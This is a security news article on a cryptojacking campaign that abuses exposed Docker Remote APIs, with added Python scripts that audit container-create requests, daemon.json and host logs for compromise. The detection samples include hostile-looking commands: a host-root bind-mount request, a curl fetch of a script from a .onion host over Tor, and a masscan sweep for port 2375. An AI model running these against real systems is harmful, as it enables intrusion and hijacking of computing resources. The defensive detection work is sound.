A cryptojacking campaign that abuses misconfigured Docker Remote APIs has been uncovered by Trend Micro researchers, revealing how attackers are combining an exposed, unauthenticated container management API with the Tor anonymity network to stealthily mine cryptocurrency across technology, financial services, and healthcare organizations. The findings, reported on June 23, 2025, highlight a growing threat landscape as cloud infrastructure becomes the primary battleground for crypto-focused cyberattacks.
The Threat Landscape
The campaign begins with a straightforward but devastating reconnaissance technique. Attackers scan the internet for exposed Docker Remote API endpoints: hosts where an administrator has bound the Docker daemon to a TCP port (2375 by default for the unencrypted listener) that is reachable without any authentication. Trend Micro observed the address 198.199.72.27 in this activity. Once an exposed endpoint is found, the attackers request a complete list of the containers running on the machine.
If no containers are present, the threat actors create a new one from the standard Alpine Linux image. The critical escalation happens at container creation: the attackers bind-mount the host's root directory as a volume inside the container, giving themselves read and write access to every file on the physical or virtual host. Strictly speaking this is not a container escape in the sense of an isolation bug; the Docker Remote API is designed to let its caller mount any host path, so anyone who can reach the daemon without authentication is already root-equivalent on the host. The effect is the same as a full escape, which is why an exposed daemon ranks among the most dangerous cloud misconfigurations.
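The create request described above is an ordinary Docker Engine API call, which means it can be audited at the daemon (for example from an authorization plugin or request log) just as easily as an attacker can send it. The following is an added example, not Trend Micro's or Docker's code: it inspects the JSON body of a `POST /containers/create` request and flags host-root bind mounts and the other settings that hand over the host. Both request bodies are constructed samples, and the in-container mount path `/host` is an assumption, since the article does not say where the host root was mounted.

```python
"""Audit a Docker Engine 'POST /containers/create' body for host-root mounts.

Added example, not Trend Micro's or Docker's code. The request shape follows
the Engine API (Image, Cmd, HostConfig.Binds / HostConfig.Mounts); the
sample bodies are constructed, and the in-container path /host used by the
attacker-style body is an assumption.
"""
import json
from typing import List

# Constructed: a create request of the kind the article describes.
# Alpine image, host root bind-mounted into the container at /host (assumed).
ATTACKER_CREATE_BODY = json.dumps({
    "Image": "alpine",
    "Cmd": ["sh"],
    "HostConfig": {"Binds": ["/:/host"]},
})

# Constructed: an ordinary request that mounts only a named volume.
BENIGN_CREATE_BODY = json.dumps({
    "Image": "nginx:alpine",
    "HostConfig": {"Binds": ["web_data:/usr/share/nginx/html:ro"]},
})

# Host paths whose bind-mount hands over the host: the root itself, the
# Docker socket, and directories that are root-equivalent on their own.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/var/run/docker.sock", "/proc", "/sys"}


def _normalize(src: str) -> str:
    """Collapse trailing slashes so '/etc/' and '/etc' compare equal."""
    return src.rstrip("/") or "/"


def _bind_source(bind: str) -> str:
    """Source part of a 'src:dst[:opts]' bind string (named volumes have no '/')."""
    return bind.split(":", 1)[0]


def audit_create_request(body: str) -> List[str]:
    """Return one finding per dangerous setting in a create-request body."""
    hc = json.loads(body).get("HostConfig") or {}
    findings: List[str] = []
    for bind in hc.get("Binds") or []:
        src = _normalize(_bind_source(bind))
        if src in SENSITIVE_HOST_PATHS:
            findings.append(f"bind-mounts host path {src} ({bind})")
    for mount in hc.get("Mounts") or []:
        if mount.get("Type") == "bind" and mount.get("Source"):
            src = _normalize(mount["Source"])
            if src in SENSITIVE_HOST_PATHS:
                findings.append(f"bind-mounts host path {src} -> {mount.get('Target')}")
    if hc.get("Privileged"):
        findings.append("requests Privileged (all capabilities, all devices)")
    if hc.get("PidMode") == "host":
        findings.append("shares the host PID namespace")
    return findings


if __name__ == "__main__":
    for name, body in (("attacker", ATTACKER_CREATE_BODY), ("benign", BENIGN_CREATE_BODY)):
        print(name, audit_create_request(body) or "clean")
```

The benign body comes back clean because a named volume has no leading slash and never resolves to a host path; the attacker-style body is flagged on the root bind alone, before the container has even started.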
Bitcoin traded at approximately $105,578 on June 23, while Ethereum sat near $2,422, making cryptocurrency mining a lucrative proposition for threat actors who can hijack enterprise-grade computing resources without bearing the cost of hardware or electricity. Note that XMRig, the miner deployed in this campaign, mines Monero rather than Bitcoin or Ethereum; Monero's CPU-friendly proof of work is precisely what makes stolen general-purpose cloud CPU time worth the effort.
Core Principles
What sets this campaign apart from typical cryptojacking operations is its layered approach to stealth and persistence. After gaining initial access through the Docker API, the attackers execute a Base64-encoded shell script that installs and configures the Tor client inside the compromised container. All subsequent command-and-control traffic is routed through Tor using the socks5h proxy scheme (the curl syntax in which the hostname is handed to the SOCKS proxy unresolved), so DNS resolution as well as the connection itself happens inside the Tor circuit. One practical consequence for defenders is that the .onion hostname never appears in the host's DNS traffic, because no local resolver is ever asked to look it up.
The final payload is fetched from a .onion domain, ensuring that the malware distribution infrastructure itself is hidden within the Tor network. This makes attribution and takedown efforts significantly more difficult for security researchers and law enforcement agencies.
Tooling & Setup
Once the container is running and Tor is operational, the attackers deploy a shell script called docker-init.sh that systematically turns the compromised host into a persistent cryptocurrency mining operation. The script first checks that the host root directory is mounted, then, through that mount, modifies the host's SSH daemon configuration to permit root login and appends an attacker-controlled public key to the authorized_keys file, so that the foothold survives even if the Docker API is later closed off.
The threat actors install a toolkit that includes masscan for high-speed network scanning, libpcap for packet capture, zstd for data compression, and torsocks for Tor-aware network operations. The infected system then beacons back to the command-and-control server with detailed system information before receiving the primary payload: a dropper binary that deploys the XMRig cryptocurrency miner along with pre-configured wallet addresses and mining pool URLs.
The use of masscan is particularly concerning because it enables the attackers to use each compromised host as a launching pad for further reconnaissance, potentially turning a single misconfigured Docker instance into a gateway for broader network compromise.
Ongoing Vigilance
Organizations running containerized infrastructure must treat Docker API security as a critical priority. The attack vector exploited here, an exposed Remote API endpoint, is entirely preventable through configuration. By default dockerd listens only on a local Unix socket; it should not be bound to a TCP port on a public interface at all. Where remote management is genuinely required, either tunnel it over SSH (docker -H ssh://user@host, supported since Docker 18.09) or run a TLS listener with tlsverify enabled so that clients must present a certificate signed by the daemon's CA, bound to a management address and firewalled. Organizations should also segment management interfaces away from general networks, deploy runtime security monitoring to detect unauthorized container creation (in particular creates that bind-mount the host root, set Privileged, or share host namespaces), alert on suspicious outbound connections, and baseline resource consumption so that cryptojacking shows up as abnormal sustained CPU usage.
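The difference between the exposed daemon this campaign relies on and a correctly configured one comes down to a handful of keys in daemon.json. The check below is an added example, not Docker's or Trend Micro's code: it reads a daemon.json, finds every tcp:// listener, and reports any that is reachable from off-host without mutual TLS, plus a wildcard bind that should be firewalled even with TLS on. Both configurations are constructed samples, and the certificate paths under /etc/docker/certs are assumptions.

```python
"""Check a dockerd daemon.json for the exposure the article describes.

Added example, not Docker's or Trend Micro's code. A tcp:// listener on a
non-loopback address without tlsverify is an unauthenticated remote API;
with tlsverify the daemon demands a client certificate signed by tlscacert.
Both samples are constructed; the /etc/docker/certs paths are assumptions.
"""
import json
from typing import List

# Constructed: the misconfiguration abused in the campaign. 2375 is Docker's
# conventional unencrypted port, 2376 the TLS one.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Constructed: remote API kept, but on a management address with mutual TLS.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.5.20:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/certs/ca.pem",
    "tlscert": "/etc/docker/certs/server-cert.pem",
    "tlskey": "/etc/docker/certs/server-key.pem",
})

LOOPBACK = {"127.0.0.1", "localhost", "::1", "[::1]"}
WILDCARD = {"0.0.0.0", "[::]"}


def _tcp_bind_address(host: str) -> str:
    """Bind address of a tcp:// host entry with the port stripped."""
    addr = host[len("tcp://"):]
    if addr.startswith("["):                      # bracketed IPv6, e.g. [::1]:2376
        return addr.split("]", 1)[0] + "]"
    return addr.rsplit(":", 1)[0] if ":" in addr else addr


def audit_daemon_config(text: str) -> List[str]:
    """Return findings for every TCP listener that is not safely configured."""
    cfg = json.loads(text)
    tls = bool(cfg.get("tlsverify"))
    findings: List[str] = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue                              # unix:// and fd:// are local only
        addr = _tcp_bind_address(host)
        if addr in LOOPBACK:
            continue
        if not tls:
            findings.append(f"{host}: remote API reachable without client-certificate auth")
        elif addr in WILDCARD:
            findings.append(f"{host}: mutual TLS on, but bound to every interface; "
                            "restrict to a management address or firewall it")
    if tls:
        for key in ("tlscacert", "tlscert", "tlskey"):
            if not cfg.get(key):
                findings.append(f"tlsverify set but {key} missing")
    return findings


if __name__ == "__main__":
    print("weak:", audit_daemon_config(WEAK_DAEMON_JSON))
    print("hardened:", audit_daemon_config(HARDENED_DAEMON_JSON) or "clean")
```

The same logic applies to a daemon started with -H flags on the command line rather than daemon.json; collect the listener list from the service unit in that case and feed it in as the "hosts" value.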
Security teams should also monitor for the installation of Tor-related packages and tools on production hosts and containers; the presence of tor or torsocks, or connections to .onion services in proxy or process logs, is a strong indicator of compromise. Because socks5h resolves names inside Tor, DNS logs alone will not show the .onion lookups, so rely on package and process telemetry, on changes to sshd_config and authorized_keys, and on outbound connections to Tor entry relays rather than on DNS.
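The persistence steps that docker-init.sh performs (root login enabled, key appended to authorized_keys, masscan and torsocks installed, payload fetched from a .onion address over socks5h) each leave a concrete, host-visible trace. The sweep below is an added example, not Trend Micro's detection content: it audits an sshd_config and an authorized_keys file against a key inventory, and scans shell-audit log lines for toolkit installs, SOCKS5 proxying, .onion references and masscan execution. Every input is a constructed sample; the key blobs, the .onion name, and the "timestamp host process: command" log layout are assumptions rather than data from the report.

```python
"""Sweep for the post-exploitation indicators the article describes.

Added example, not Trend Micro's detection content. Inputs are constructed
samples: the key blobs, the .onion name and the
'<timestamp> <host> <process>: <command>' log layout are all assumptions.
"""
import re
from typing import List, Set, Tuple

TOOLKIT = {"masscan", "torsocks", "tor", "libpcap", "zstd", "xmrig"}
ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b")      # v2 (16) / v3 (56) names
SOCKS_RE = re.compile(r"socks5h?://")                     # curl-style proxy URL
INSTALL_RE = re.compile(r"^(apk add|apt-get install|apt install|yum install|dnf install)\b(.*)$")

# Constructed sshd_config after the intruder's edit.
SSHD_CONFIG = """\
Port 22
# PermitRootLogin prohibit-password
PermitRootLogin yes
PasswordAuthentication no
"""
# Constructed inventory of approved key blobs and an authorized_keys snapshot.
KNOWN_KEY_BLOBS: Set[str] = {"AAAAC3NzaC1lZDI1NTE5AAAAIGoodKeyFromInventory"}
AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoodKeyFromInventory ops@bastion
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIUnknownKeyInjected root@container
"""
# Constructed .onion name (56 base32-looking characters) and log lines.
ONION_SAMPLE = "example" * 8 + ".onion"
LOG_LINES = [
    "2025-06-23T10:14:02Z node1 sh: apk add masscan libpcap zstd torsocks tor",
    f"2025-06-23T10:15:11Z node1 sh: curl -x socks5h://127.0.0.1:9050 http://{ONION_SAMPLE}/docker-init.sh",
    "2025-06-23T10:16:40Z node1 sh: masscan 10.0.0.0/8 -p2375 --rate 10000",
    "2025-06-23T10:17:00Z node1 sh: apk add nginx",
]


def audit_sshd_config(text: str) -> List[str]:
    """Flag PermitRootLogin values other than 'no' / 'prohibit-password'."""
    findings: List[str] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()           # drop comments
        if not line:
            continue
        key, _, value = line.partition(" ")
        if key.lower() == "permitrootlogin" and value.strip().lower() not in ("no", "prohibit-password"):
            findings.append(f"PermitRootLogin is {value.strip()!r}")
    return findings


def unknown_authorized_keys(text: str, known: Set[str]) -> List[str]:
    """Return 'keytype comment' for every key whose blob is not in the inventory."""
    unknown: List[str] = []
    for raw in text.splitlines():
        parts = raw.split()
        if len(parts) < 2 or parts[0].startswith("#"):
            continue
        keytype, blob = parts[0], parts[1]
        comment = parts[2] if len(parts) > 2 else ""
        if blob not in known:
            unknown.append(f"{keytype} {comment}".strip())
    return unknown


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Flag toolkit installs, SOCKS proxying, .onion references and tool runs."""
    hits: List[Tuple[int, str]] = []
    for num, line in enumerate(lines, 1):
        _, _, cmd = line.partition(": ")              # everything after 'process: '
        cmd = cmd.strip()
        if not cmd:
            continue
        m = INSTALL_RE.match(cmd)
        if m:
            pkgs = sorted(set(m.group(2).split()) & TOOLKIT)
            if pkgs:
                hits.append((num, "installs " + ", ".join(pkgs)))
        if cmd.split()[0] in ("masscan", "torsocks", "xmrig"):
            hits.append((num, f"executes {cmd.split()[0]}"))
        if SOCKS_RE.search(cmd):
            hits.append((num, "routes traffic through a SOCKS5 proxy (Tor-style)"))
        if ONION_RE.search(cmd):
            hits.append((num, "references a .onion address"))
    return hits


if __name__ == "__main__":
    print(audit_sshd_config(SSHD_CONFIG))
    print(unknown_authorized_keys(AUTHORIZED_KEYS, KNOWN_KEY_BLOBS))
    for num, reason in scan_log_lines(LOG_LINES):
        print(num, reason)
```

The log scan deliberately keys on the command text rather than on DNS, for the reason given above: with socks5h the .onion name only ever appears in the curl argument and inside the Tor circuit, never in a resolver query.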
Final Takeaway
The convergence of container exploitation and anonymity networks represents an evolution in cryptojacking sophistication that demands a corresponding evolution in defensive capabilities. The campaign mirrors techniques previously attributed to an actor known as Commando Cat, suggesting that successful attack methodologies are being iterated and refined across multiple threat groups. As organizations continue to expand their container footprints, the attack surface for these types of campaigns will only grow, making proactive hardening of Docker configurations an operational necessity rather than a best practice.
Disclaimer: This article is for informational purposes only and does not constitute financial or security advice. Always conduct your own research and consult with security professionals regarding infrastructure protection.
The fundamental value proposition of crypto keeps getting stronger
The gap between crypto and TradFi is narrowing fast
Education is still the biggest barrier to mainstream adoption
This is exactly the kind of development the space needs
Mounting the entire host root directory as a volume is next level careless. One exposed port and the attacker owns the whole machine.
Every cycle the infrastructure gets more robust
The infrastructure gets more robust and the attacks get more sophisticated. It's an arms race and defenders are always one step behind.
Alpine Linux containers mining Monero through Tor. Old technique, but combining it with Docker API exposure makes it way more scalable.